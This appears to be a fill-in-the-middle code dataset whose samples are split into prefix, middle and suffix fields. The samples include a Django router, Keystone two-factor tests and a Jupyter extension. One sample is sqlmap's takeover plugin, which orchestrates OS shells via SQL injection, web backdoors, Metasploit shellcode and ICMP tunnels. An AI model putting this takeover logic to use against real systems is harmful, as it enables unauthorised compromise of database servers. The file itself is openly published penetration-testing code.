repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
---|---|---|---|---|---|---|---|---|
helicontech/zoo
|
Zoocmd/core/models/base_product.py
|
Python
|
apache-2.0
| 16,060 | 0.002684 |
# -*- coding: utf-8 -*-
from core.exce
|
ption import ProductError
from core.core import Core
from core.helpers.yaml_literal import Literal
from core.env_manager import EnvManager
from core.helpers.version import compare_versions
from core.download_manager import DownloadManager
from core.log_
|
manager import LogManager
from core.models.platform import Platform
from core.models.file import File
from core.models.installer import Installer
from core.models.installed_product import InstalledProductInfo
import os
from collections import Iterable
from collections import OrderedDict
class BaseProduct(object):
"""
Represent abstract class for product.
Descendants: Product, Application, Engine.
"""
def get_typename(self):
"""
Descendant return string with type name: 'product', 'application' or 'engine'.
This type name used in yaml represenstion for product:
- product: Product1
title: ...
"""
raise NotImplementedError()
def __init__(self, core: Core, attrs=None ):
self.data = {}
# internal
self.core = core
# self.envs do nothing
self.envs = EnvManager()
self.installer = None
# next fields are loaded from yaml
# meta
self.name = None
self.title = None
self.description = None
self.link = None
self.author = None
self.icon = None
# string list
self.tags = []
self.eula = None
# fiters
self.os = None
self.bitness = None
self.web_server = None
self.lang = None
self.platform = None
# versions
self.version = ''
self.installed_version = ''
# installer stuff
self.dependencies = []
self.files = []
self.install_command = None
self.upgrade_command = None
self.config = None
self.uninstall_command = None
self.find_installed_command = None
self.parameters = {}
if attrs is not None:
for item in attrs.keys():
self.__dict__[item] = attrs[item]
self.name = attrs[self.get_typename()]
if attrs.get('files'):
# create File objects for every file item
self.files = []
for f in attrs.get('files', []):
if f.get('file'):
self.files.append(File(self, **f))
self.installer = Installer(self, self.install_command, self.upgrade_command,
self.uninstall_command, self.find_installed_command)
def merge(self, **kwargs):
"""
Merges product representation in 'kwargs' dict with current product.
Current product fields are overwritten by values from kwargs.
:param kwargs: dict with product representation to merge.
"""
# name of attribute (product, engine, application) with product name
typename = self.get_typename()
self.name = kwargs[typename]
####
self.title = kwargs.get('title') or self.title
self.description = kwargs.get('description') or self.description
self.link = kwargs.get('link') or self.link
self.author = kwargs.get('author') or self.author
self.icon = kwargs.get('icon') or self.icon
self.tags = kwargs.get('tags') or self.tags
self.eula = kwargs.get('eula') or self.eula
self.os = kwargs.get('os') or self.os
self.bitness = kwargs.get('bitness') or self.bitness
self.web_server = kwargs.get('webserver') or self.web_server
self.lang = kwargs.get('lang') or self.lang
# это поле не читается из ямла, оно создаётся из:
self.platform = Platform(self.os, self.bitness, self.web_server, self.lang)
self.dependencies = kwargs.get('dependencies', []) or self.dependencies
self.version = str(kwargs.get('version', '')) or self.version
self.installed_version = str(kwargs.get('installed_version', '')) or self.installed_version
self.config = kwargs.get('config') or self.config
files_list = kwargs.get('files', [])
if files_list and len(files_list)>0:
# create File objects for every file item
self.files = []
for f in files_list:
fs = f.__getstate__() if isinstance(f, File) else f
if fs.get('file'):
self.files.append(File(self, **fs))
self.install_command = kwargs.get('install_command', None) or self.install_command
if self.install_command:
self.install_command = self.install_command.rstrip()
self.upgrade_command = kwargs.get('upgrade_command', None) or self.upgrade_command
if self.upgrade_command:
self.upgrade_command = self.upgrade_command.rstrip()
self.uninstall_command = kwargs.get('uninstall_command', None) or self.uninstall_command
if self.uninstall_command:
self.uninstall_command = self.uninstall_command.rstrip()
self.find_installed_command = kwargs.get('find_installed_command', None) or self.find_installed_command
if self.find_installed_command:
self.find_installed_command = self.find_installed_command.rstrip()
self.parameters = kwargs.get('parameters', None) or self.parameters
# TODO must be deprecated
# create Installer from commands,
# installer knows to how call install_command, uninstall_command
self.installer = Installer(self, self.install_command,
self.upgrade_command,
self.uninstall_command,
self.find_installed_command)
def __setattr__(self, name, value):
self.__dict__[name] = value
def __getstate__(self):
"""
Returns ProductState object used in Yaml dumper.
ProductState is smart OrderedDict wrapper.
Method saves only non empty fields.
:rtype : ProductState
"""
result = ProductState()
result[self.get_typename()] = self.name
if self.title:
result['title'] = self.title
if self.description:
result['description'] = Literal(self.description)
if self.link:
result['link'] = self.link
if self.author:
result['author'] = self.author
if self.icon:
result['icon'] = self.icon
if self.tags:
result['tags'] = self.tags
if self.eula:
result['eula'] = self.eula
if self.os:
result['os'] = self.os
if self.bitness:
result['bitness'] = self.bitness
if self.web_server:
result['web_server'] = self.web_server
if self.lang:
result['lang'] = self.lang
if self.version:
result['version'] = self.version
result['installed_version'] = self.get_installed_version()
if self.dependencies:
result['dependencies'] = self.dependencies
if self.files:
result['files'] = [file.__getstate__() for file in self.files]
if self.install_command:
result['install_command'] = Literal(self.install_command)
if self.upgrade_command:
result['upgrade_command'] = Literal(self.upgrade_command)
if self.uninstall_command:
result['uninstall_command'] = Literal(self.uninstall_command)
if self.find_installed_command:
result['find_installed_command'] = Literal(self.find_installed_command)
result['parameters'] = self.parameters or []
if self.config:
result["config"] = self.config
return result
def to_dict(self, rich=False)-> OrderedDict:
"""
Dump product fields to OrderedDict used in JSON responses.
:param rich: dump additional calculated fields.
"""
product_dict = self.__getstate__().get_dict()
if rich:
product_dict['name'] = self.name
|
dnerdy/django-reroute
|
reroute/verbs.py
|
Python
|
mit
| 4,764 | 0.009236 |
# Copyright (c) 2010 Mark Sandstrom
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from functools import partial
from django.http import HttpResponse
from base import RerouteRegexURLPattern, url_with_pattern_class
from utils import rollup
__all__ = ['verb_url', 'request_method']
def request_method(request):
'''Returns the effective HTTP method of a request. To support the entire range of HTTP methods
from HTML forms (which only support GET and POST), an HTTP method may be emulated by
setting a POST parameter named "_method" to the name of the HTTP method to be emulated.
Example HTML:
<!-- Submits a form using the PUT method -->
<form>
<input type="text" name="name" value="value" />
<button type="submit" name="_method" value="put">Update</button>
</form>
Args:
request: an HttpRequest
Returns:
An upper-case string naming the HTTP method (l
|
ike django.http.HttpRequest.method)
'''
# For security reasons POST is the only method that supports HTTP method emulation.
# For example, if POST requires csrf_token, we
|
don't want POST methods to be called via
# GET (thereby bypassing CSRF protection). POST has the most limited semantics, and it
# is therefore safe to emulate HTTP methods with less-limited semantics. See
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html ("Safe and Idempotent Methods")
# for details.
if request.method == 'POST' and '_method' in request.POST:
method = request.POST['_method'].upper()
else:
method = request.method
return method
class VerbRegexURLPattern(RerouteRegexURLPattern):
patterns_index = {}
def __init__(self, method, *args, **kwargs):
super(VerbRegexURLPattern, self).__init__(*args, **kwargs)
self.method = method.upper()
def reroute_callback(self, request, *args, **kwargs):
record = self.method_callbacks.get(request_method(request))
if not record:
return HttpResponse(status=405)
callback = record['callback']
kwargs.update(record['default_args'])
callback = rollup(callback, self.wrappers)
return callback(request, *args, **kwargs)
def reroute_config(self, wrappers, patterns_id):
super(VerbRegexURLPattern, self).reroute_config(wrappers, patterns_id)
# Let patterns with identical regexes that are defined within the same call
# to reroute_patterns be called a pattern group. Each pattern in a pattern group
# has a reference to shared dict (shared by the group) which maps http methods
# to pattern callbacks. Only one pattern from a group will ever be resolved (remember
# that the patterns all have identical regexes), so this shared dict is used to route
# to the correct callback for a given http method. All this hoopla is necessary since
# patterns are resolved outside the context of a request.
method_callbacks_by_regex = self.patterns_index.setdefault(patterns_id, {})
method_callbacks = method_callbacks_by_regex.setdefault(self.regex.pattern, {})
if self.method not in method_callbacks:
method_callbacks[self.method] = {'callback': self.callback, 'default_args': self.default_args}
self.default_args = {}
# Borg-like
self.method_callbacks = method_callbacks
def verb_url(method, regex, view, kwargs=None, name=None, prefix=''):
pattern_class = partial(VerbRegexURLPattern, method)
return url_with_pattern_class(pattern_class, regex, view, kwargs, name, prefix)
|
chevah/txghserf
|
txghserf/__init__.py
|
Python
|
bsd-3-clause
| 32 | 0 |
"""
GitHu
|
b Web
|
Hooks Server.
"""
|
jwilder/nginx-proxy
|
test/test_default-host.py
|
Python
|
mit
| 212 | 0.004717 |
import pytest
def test_fallback_on_default(docker_compose, nginxproxy):
r = nginxproxy.ge
|
t("http://unknown.nginx-proxy.tld/port")
assert r.status_code == 200
ass
|
ert r.text == "answer from port 81\n"
|
cmd-ntrf/jupyter-lmod
|
jupyterlmod/__init__.py
|
Python
|
mit
| 1,051 | 0.001903 |
from jupyter_server.utils import url_path_join as ujoin
from .config import Lmod as LmodConfig
from .handler import default_handlers, PinsHandler
def _jupyter_server_extension_paths():
return [{"module": "jupyterlmod"}]
# Jupyter Extension points
def _jupyter_nbextension_paths():
return [
dict(
section="tree", src="static", dest="jupyterlmod", require="jupyterlmod/main"
)
]
def load_jupyter_server_extension(nbapp):
"""
Called when the extension is loaded.
Args:
nbapp : handle to the Notebook webserver instance.
"""
nbapp.log.info("Loading lmod extension")
|
lmod_config = LmodConfig(parent=nbapp)
launcher_pins = lmod_config.launcher_pins
web_app = nbapp.web_app
base_url = web_app.settings["base_url"]
for path, class_ in default_handlers:
web_app.add_handlers(".*$", [(ujoin(base_url, path), class_)])
web_app.add_handlers(".*$", [
(ujoin(base_
|
url, 'lmod/launcher-pins'), PinsHandler, {'launcher_pins': launcher_pins}),
])
|
cmjagtap/Algorithms_and_DS
|
searching/twoRepetedEle.py
|
Python
|
gpl-3.0
| 296 | 0.101351 |
def twoRepEle(array):
if not array:
return None
else:
hash_table={}
for x in array:
if x in hash_table:
ha
|
sh_table[x]
|
+=1
elif x !=' ':
hash_table[x]=1
else:
hash_table[x]=0
for x in array:
if hash_table[x]==2:
print x
array=[1,2,3,1,2,5,6,7]
twoRepEle(array)
|
nickpascucci/Robot-Arm
|
software/desktop/brazo/brazo/AboutBrazoDialog.py
|
Python
|
mit
| 725 | 0.011034 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
### BEGIN LICENSE
# This file is in the public domain
### END LICENSE
import gettext
from gettext import gettext as _
gettext.textdomain('brazo')
import logging
logger = logging.getLogger('brazo')
from brazo_lib.AboutDialog import AboutDialog
# See brazo_lib.AboutDialog.py for more details about how this class works.
class AboutBrazoDialog(AboutDialog):
__gtype_name__ = "AboutBrazoDialog"
def finish_initializing(self
|
, builder): # pylint: disable=E1002
"""Set up the about dialog"""
super(AboutBrazoDialog, self).finish_initializing(builder)
# Code for other initialization actio
|
ns should be added here.
|
sstacha/uweb-install
|
cms_files/forms.py
|
Python
|
apache-2.0
| 192 | 0.005208 |
from django impo
|
rt forms
class LoginForm(forms.Form):
login = forms.CharField(max_length=255)
password = forms.CharField(widget=forms.PasswordInput())
target = forms.CharField()
| |
V11/volcano
|
server/sqlmap/plugins/generic/takeover.py
|
Python
|
mit
| 17,888 | 0.001453 |
#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
from lib.core.common import Backend
from lib.core.common import isStackingAvailable
from lib.core.common import readInput
from lib.core.common import runningAsAdmin
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapUndefinedMethod
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.takeover.abstraction import Abstraction
from lib.takeover.icmpsh import ICMPsh
from lib.takeover.metasploit import Metasploit
from lib.takeover.registry import Registry
from plugins.generic.misc import Miscellaneous
class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
"""
This class defines generic OS takeover functionalities for plugins.
"""
def __init__(self):
self.cmdTblName = "sqlmapoutput"
self.tblField = "data"
Abstraction.__init__(self)
def osCmd(self):
if isStackingAvailable() or conf.direct:
web = False
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command execution"
logger.info(infoMsg)
web = True
else:
errMsg = "unable to execute operating system commands via "
errMsg += "the back-end DBMS"
raise SqlmapNotVulnerableException(errMsg)
self.getRemoteTempPath()
self.initEnv(web=web)
if not web or (web and self.webBackdoorUrl is not None):
self.runCmd(conf.osCmd)
if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.cleanup(web=web)
def osShell(self):
if isStackingAvailable() or conf.direct:
web = False
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command prompt"
logger.info(infoMsg)
web = True
else:
errMsg = "unable to prompt for an interactive operating "
errMsg += "system shell via the back-end DBMS because "
errMsg += "stacked queries SQL injection is not supported"
raise SqlmapNotVulnerableException(errMsg)
self.getRemoteTempPath()
self.initEnv(web=web)
if not web or (web and self.webBackdoorUrl is not None):
self.shell()
if not conf.osPwn and not conf.cleanup:
self.cleanup(web=web)
def osPwn(self):
goUdf = False
fallbackToWeb = False
setupSuccess = False
self.checkDbmsOs()
if Backend.isOs(OS.WINDOWS):
msg = "how do you want to establish the tunnel?"
msg += "\n[1] TCP: Metasploit Framework (default)"
msg += "\n[2] ICMP: icmpsh - ICMP tunneling"
valids = (1, 2)
while True:
tunnel = readInput(msg, default=1)
if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids:
tunnel = int(tunnel)
break
elif isinstance(tunnel, int) and tunnel in valids:
break
else:
warnMsg = "invalid value, valid values are 1 and 2"
logger.warn(warnMsg)
else:
tunnel = 1
debugMsg = "the tunnel can be established only via TCP when "
debugMsg += "the back-end DBMS is not Windows"
logger.debug(debugMsg)
if tunnel == 2:
isAdmin = runningAsAdmin()
if not isAdmin:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to establish an out-of-band ICMP "
errMsg += "tunnel because icmpsh uses raw sockets to "
errMsg += "sniff and craft ICMP packets"
raise SqlmapMissingPrivileges(errMsg)
try:
from impacket import ImpactDecoder
from impacket import ImpactPacket
except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at "
errMsg += "http://code.google.com/p/impacket/downloads/list"
raise SqlmapMissingDependence(errMsg)
sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
if os.path.exists(sysIgnoreIcmp):
fp = open(sysIgnoreIcmp, "wb")
fp.write("1")
fp.close()
else:
errMsg = "you need to disable ICMP replies by your machine "
errMsg += "system-wide. For example run on Linux/Unix:\n"
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands sent from you"
logger.error(errMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval")
self.getRemoteTempPath()
if isStackingAvailable() or conf.direct:
web = False
self.initEnv(web=web)
if tunnel == 1:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)"
while True:
choice = readInput(msg, default=1)
if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2):
choice = int(choice)
break
elif isinstance(choice, int) and choice in (1, 2):
break
else:
warnMsg
|
= "invalid value, valid values are 1 and 2"
logger.warn(warnMsg)
if choice == 1:
goUdf = True
if goUdf:
exitfunc = "thread"
setupSuccess = True
else:
exitfunc = "process"
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=
|
EAX", encode="x86/alpha_mixed")
if not goUdf:
setupSuccess = self.uploadShellcodeexec(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
|
locationtech/geowave
|
python/src/main/python/pygw/statistics/statistic.py
|
Python
|
apache-2.0
| 5,623 | 0.001067 |
#
# Copyright (c) 2013-2020 Contributors to the Eclipse Foundation
#
# See the NOTICE file distributed with this work for additional information regarding copyright
# ownership. All rights reserved. This program and the accompanying materials are made available
# under the terms of the Apache License, Version 2.0 which accompanies this distribution and is
# available at http://www.apache.org/licenses/LICENSE-2.0.txt
# ===============================================================================================
from pygw.base import GeoWaveObject
from .statistic_binning_strategy import StatisticBinningStrategy
from .statistic_type import DataTypeStatisticType, IndexStatisticType, FieldStatisticType
from .binning_strategy_mappings import map_binning_strategy
from ..base.java_transformer import NoOpTransformer
class Statistic(GeoWaveObject):
"""
Base GeoWave statistic.
"""
def __init__(self, java_ref, java_transformer=NoOpTransformer()):
self.java_transformer = java_transformer
super().__init__(java_ref)
def get_statistic_type(self):
"""
Get the statistic type associated with the statistic.
Returns:
The type of this statistic.
"""
pass
def get_description(self):
"""
Gets a description of the statistic.
Returns:
A description of the statistic.
"""
return self._java_ref.getDescription()
def set_tag(self, tag):
"""
Sets the tag of the statistic.
Args:
tag (str): The tag to use for the statistic
"""
self._java_ref.setTag(tag)
def get_tag(self):
"""
Get the tag for the statistic.
Returns:
The tag for this statistic.
"""
return self._java_ref.getTag()
def set_internal(self):
"""
Set the tag of this statistic to the default internal statistic tag.
"""
self._java_ref.setInternal()
def is_internal(self):
"""
Checks if the statistic is an internal statistic.
Returns:
True if the statistic is internal.
"""
return self._java_ref.isInternal()
def set_binning_strategy(self, binning_strategy):
"""
Sets the binning strategy of the statistic.
Args:
binning_strategy (StatisticBinningStrategy): The binning strategy to use for the statistic.
"""
if not isinstance(binning_strategy, StatisticBinningStrategy):
raise AttributeError('Expected an instance of StatisticBinningStrategy')
self._java_ref.setBinningStrategy(binning_strategy.java_ref())
def get_binning_strategy(self):
"""
Gets the binning strategy used by the statistic.
Returns:
The binning strategy used by the statistic.
"""
return map_binning_strategy(self._java_ref.getBinningStrategy())
class IndexStatistic(Statistic):
def get_statistic_type(self):
"""
Get the statistic type associated with the statistic.
Returns:
The type of this statistic.
"""
return IndexStatisticType(self._java_ref.getStatisticType())
def set_index_name(self, name):
"""
Sets the index name of the statistic.
Args:
name (str): The index name to use for the statistic
"""
self._java_ref.setIndexName(name)
def get_index_name(self):
"""
Get the index name associated with the statistic.
Returns:
The index name of this statistic.
"""
return self._java_ref.getIndexName()
class DataTypeStatistic(Statistic):
def get_statistic_type(self):
"""
Get the statistic type associated with the statistic.
Returns:
The type of this statistic.
"""
return DataTypeStatisticType(self._java_ref.getStatisticType())
def set_type_name(self, name):
"""
Sets the type name of the statistic.
Args:
name (str): The type name to use for the stat
|
istic
"""
self._java_ref.setTypeName(name)
def get_type_name(self):
"""
Get the type name associated with the statistic.
Returns:
The type name of this statistic.
"""
return self._java_ref.getTypeName()
class FieldStatistic(Statistic):
def get_statistic_type(self):
"""
Get the statistic type associated with the statistic.
Returns:
The type of this statistic.
|
"""
return FieldStatisticType(self._java_ref.getStatisticType())
def set_type_name(self, name):
"""
Sets the type name of the statistic.
Args:
name (str): The type name to use for the statistic
"""
self._java_ref.setTypeName(name)
def get_type_name(self):
"""
Get the type name associated with the statistic.
Returns:
The type name of this statistic.
"""
return self._java_ref.getTypeName()
def set_field_name(self, field_name):
"""
Sets the field name of the statistic.
Args:
field_name (str): The field name to use for the statistic
"""
self._java_ref.setFieldName(field_name)
def get_field_name(self):
"""
Get the field name associated with the statistic.
Returns:
The field name of this statistic.
"""
return self._java_ref.getFieldName()
|
ging/keystone
|
keystone/tests/test_v3_two_factor_auth.py
|
Python
|
apache-2.0
| 19,566 | 0.001738 |
# Copyright (C) 2015 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
from keystone.tests import test_v3
from keystone.common import config as common_cfg
from keystone.contrib.two_factor_auth import controllers
from keystone.contrib.two_factor_auth import core
from keystone.openstack.common import log
from keystone import exception
import pyotp
import json
LOG = log.getLogger(__name__)
TWO_FACTOR_USER_URL = '/users/{user_id}'
TWO_FACTOR_BASE_URL = '/OS-TWO-FACTOR'
AUTH_ENDPOINT = '/two_factor_auth'
QUESTION_ENDPOINT = '/sec_question'
DATA_ENDPOINT = '/two_factor_data'
DEVICES_ENDPOINT = '/devices'
TWO_FACTOR_URL = TWO_FACTOR_USER_URL + TWO_FACTOR_BASE_URL + AUTH_ENDPOINT
TWO_FACTOR_QUESTION_URL = TWO_FACTOR_USER_URL + TWO_FACTOR_BASE_URL + QUESTION_ENDPOINT
TWO_FACTOR_DATA_URL = TWO_FACTOR_USER_URL + TWO_FACTOR_BASE_URL + DATA_ENDPOINT
TWO_FACTOR_DEVICES_URL = TWO_FACTOR_USER_URL + TWO_FACTOR_BASE_URL + DEVICES_ENDPOINT
class TwoFactorBaseTests(test_v3.RestfulTestCase):
EXTENSION_NAME = 'two_factor_auth'
EXTENSION_TO_ADD = 'two_factor_auth_extension'
SAMPLE_SECURITY_QUESTION = 'Sample question'
SAMPLE_SECURITY_ANSWER = 'Sample answer'
def setUp(self):
super(TwoFactorBaseTests, self).setUp()
# Now that the app has been served, we can query CONF values
self.base_url = 'http://localhost/v3'
self.controller = controllers.TwoFactorV3Controller()
self.manager = core.TwoFactorAuthManager()
def _create_two_factor_key(self, user_id, expected_status=None):
data = self.new_ref()
data['security_question'] = self.SAMPLE_SECURITY_QUESTION
data['security_answer'] = self.SAMPLE_SECURITY_ANSWER
return self.post(
TWO_FACTOR_URL.format(user_id=user_id),
body={'two_factor_auth': data},
expected_status=expected_status
)
def _create_two_factor_key_no_data(self, user_id, expected_status=None):
return self.post(
TWO_FACTOR_URL.format(user_id=user_id),
expected_status=expected_status
)
def _delete_two_factor_key(self, user_id, expected_status=None):
return self.delete(TWO_FACTOR_URL.format(user_id=user_id), expected_status=expected_status)
def _check_is_two_factor_enabled(self, expected_status=None, **kwargs):
return self.head(
TWO_FACTOR_BASE_URL + AUTH_ENDPOINT + '?' +urllib.urlencode(kwargs),
expected_status=expected_status)
def _check_security_question(self, user_id, sec_answer, expected_status=None):
body = {
'two_factor_auth': {
'security_answer': sec_answer
}
}
return self.get(TWO_FACTOR_QUESTION_URL.format(user_id=user_id),
expected_status=expected_status,
body=body)
def _get_two_factor_data(self, user_id, expected_status=None):
return self.get(TWO_FACTOR_DATA_URL.format(user_id=user_id),
expected_status=expected_status)
def _remember_device(self, user_id, expected_status=None, **kwargs):
try:
kwargs['user_id'] = user_id
self.manager.is_two_factor_enabled(user_id=user_id)
except exception.NotFound:
self._create_two_factor_key(user_id=user_id)
return json.loads(self.post(TWO_FACTOR_BASE_URL + DEVICES_ENDPOINT + '?' + urllib.urlencode(kwargs)).bo
|
dy)['two_factor_auth']
def _check_for_device(self, expected_status=None, **kwargs):
response = self.head(TWO_FACTOR_BASE_URL + DEVICES_ENDPOINT + '?' + urllib.
|
urlencode(kwargs), expected_status=expected_status)
def _delete_devices(self, user_id, expected_status=None):
return self.delete(TWO_FACTOR_DEVICES_URL.format(user_id=user_id), expected_status=expected_status)
def _create_user(self):
user = self.new_user_ref(domain_id=self.domain_id)
password = user['password']
user = self.identity_api.create_user(user)
user['password'] = password
return user
def _delete_user(self, user_id):
self.delete(TWO_FACTOR_USER_URL.format(user_id=user_id))
class TwoFactorCRUDTests(TwoFactorBaseTests):
def test_two_factor_enable(self):
self._create_two_factor_key(user_id=self.user_id)
def test_two_factor_new_code(self):
key1 = self._create_two_factor_key(user_id=self.user_id)
key2 = self._create_two_factor_key(user_id=self.user_id)
self.assertNotEqual(key1, key2)
def test_two_factor_new_code_no_data_right(self):
self._create_two_factor_key(user_id=self.user_id)
self._create_two_factor_key_no_data(user_id=self.user_id)
def test_two_factor_new_code_no_data_wrong(self):
self._create_two_factor_key_no_data(user_id=self.user_id, expected_status=400)
def test_two_factor_disable_after_enabling(self):
self._create_two_factor_key(user_id=self.user_id)
self._delete_two_factor_key(user_id=self.user_id)
def test_two_factor_disable_without_enabling(self):
self._delete_two_factor_key(user_id=self.user_id, expected_status=404)
def test_two_factor_is_enabled(self):
self._create_two_factor_key(user_id=self.user_id)
self._check_is_two_factor_enabled(user_id=self.user_id)
def test_two_factor_is_enabled_name_and_domain(self):
self._create_two_factor_key(user_id=self.user_id)
self._check_is_two_factor_enabled(
user_name=self.user['name'],
domain_id=self.user['domain_id'])
def test_two_factor_is_disabled(self):
self._check_is_two_factor_enabled(user_id=self.user_id, expected_status=404)
def test_two_factor_is_disabled_name_and_domain(self):
self._check_is_two_factor_enabled(
user_name=self.user['name'],
domain_id=self.user['domain_id'],
expected_status=404)
def test_two_factor_check_no_params(self):
self._check_is_two_factor_enabled(expected_status=400)
def test_two_factor_check_no_domain(self):
self._check_is_two_factor_enabled(
user_name=self.user['name'],
expected_status=400)
def test_two_factor_check_no_username(self):
self._check_is_two_factor_enabled(
domain_id=self.user['domain_id'],
expected_status=400)
def test_two_factor_is_enabled_after_deleting(self):
self._create_two_factor_key(user_id=self.user_id)
self._check_is_two_factor_enabled(user_id=self.user_id)
self._delete_two_factor_key(user_id=self.user_id)
self._check_is_two_factor_enabled(user_id=self.user_id, expected_status=404)
def test_two_factor_create_key_for_nonexistent_user(self):
self._create_two_factor_key(user_id='nonexistent_user', expected_status=404)
def test_two_factor_delete_user(self):
user = self._create_user()
self._create_two_factor_key(user_id=user['id'])
self._check_is_two_factor_enabled(user_id=user['id'])
self._delete_user(user['id'])
self._check_is_two_factor_enabled(user_id=user['id'], expected_status=404)
class TwoFactorSecQuestionTests(TwoFactorBaseTests):
def test_security_question_get(self):
self._create_two_factor_key(user_id=self.user_id)
data = self._get_two_factor_data(user_id=self.user_id)
self.assertEqual(data.result['two_factor_auth']['security_question'],
self.SAMPLE_SECURITY_QUESTION)
def test_security_question_correct(self):
self._create_two_factor_key(user_id=self.user_id)
|
dmonroy/chilero.pg
|
tests/test_sample_app.py
|
Python
|
mit
| 8,628 | 0.000695 |
import asyncio
import random
import names
from chilero.web.test import asynctest
from chilero.pg import Resource
from chilero.pg.test import TestCase, TEST_DB_SUFFIX
import json
class Friends(Resource):
order_by = 'name ASC'
search_fields = ['name']
allowed_fields = ['name', 'meta']
required_fields = ['name']
allow_order_by = ['name']
def serialize_object(self, row):
return dict(
id=row[0],
name=row[1],
meta=row[2],
url=self.get_object_url(row[0])
)
def serialize_list_object(self, row):
return dict(
name=row[1],
url=self.get_object_url(row[0])
)
class Friends2(Resource):
order_by = 'name ASC'
search_fields = ['name']
allowed_fields = ['name', 'meta']
required_fields = ['name']
allow_order_by = ['name']
table_name = 'friends'
def serialize_object(self, row):
return dict(
id=row[0],
name=row[1],
meta=row[2],
url=self.get_object_url(row[0])
)
def serialize_list_object(self, row):
return dict(
name=row[1],
url=self.get_object_url(row[0])
)
def index(self):
condition = dict(name='pedro', meta='{}')
index = yield from self.do_index(condition)
return self.response(index)
class BaseTestCase(TestCase):
settings = dict(
db_url='postgres://postgres@localhost:5432/chilero_pg_{}'.format(
TEST_DB_SUFFIX
)
)
routes = [
['/friends', Friends],
['/friends2', Friends2]
]
@asyncio.coroutine
def _create_friend(self, **kwargs):
defaults = dict(
name=self._random_string(),
meta=json.dumps(dict(name='name1', data2='data2'))
)
return(
yield from self._create_and_get('/friends', kwargs, defaults)
)
class TestAdvancedOptions(BaseTestCase):
@asyncio.coroutine
def _a_lot_of_friends(self):
# create a lot of friends
all_names = []
for i in range(100):
name = names.get_full_name()+str(i)
all_names.append(name)
_, f = yield from self._create_friend(name=name)
t = yield from _.text()
print(t)
assert _.status==201
_.close()
return all_names
@asynctest
def test_pagination(self):
yield from self._a_lot_of_friends()
# list with default values
# page 1
r = yield from self._get_json(self.full_url('/friends'))
assert r['data']['count'] >= 100
assert r['data']['prev'] == None
assert 'offset=20' in r['data']['next']
assert 'limit=20' in r['data']['next']
assert len(r['index']) == r['data']['length']
# page 2
r = yield from self._get_json(r['data']['next'])
assert 'offset=0' in r['data']['prev']
assert 'offset=40' in r['data']['next']
assert len(r['index']) == r['data']['length']
assert len(r['index'][0].keys()) == 2
